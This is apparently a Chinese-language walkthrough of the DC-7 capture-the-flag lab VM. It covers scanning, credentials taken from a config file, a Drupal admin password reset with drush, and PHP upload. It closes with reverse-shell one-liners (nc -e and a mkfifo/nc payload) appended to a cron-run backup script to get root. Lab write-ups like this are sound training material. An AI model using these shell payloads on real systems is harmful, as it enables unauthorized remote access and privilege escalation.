靶机:http://www.five86.com/downloads/DC-7.zip
网络模式:NAT
1.主机发现
arp-scan -l
192.168.194.167
nmap -p- -A 192.168.194.167
22/tcp open ssh
80/tcp open http
2.网站信息收集
在下面
在代码config.php中找到一个账号密码
$username = “dc7user”;
$password = “MdR3xOgB7#dW”;
在robots.txt中,发现登录界面路径
用之前的账号密码登不了,想起还有个22端口的ssh,试试,可以
查看mbox
虽然很长,但是内容基本重复,可以得到的信息是存在一个定时任务,备份数据库文件,参考
cat /opt/scripts/backups.sh
www-data 具有权限,需要获取相应shell,再利用backups.sh提权
drush 命令可以修改密码
drush user-password admin --password="123456"
3.登录网站
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
折叠查找更快
可以写php文件了
路径为首页
4.定时任务提权
nc -e /bin/bash 192.168.194.156 7777
nc -lvvp 7777
利用backups.sh文件提权
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.194.156 6666 >/tmp/f" >> backups.sh
另一个终端监听
通过邮件的时间可以得知该脚本每15分钟执行一次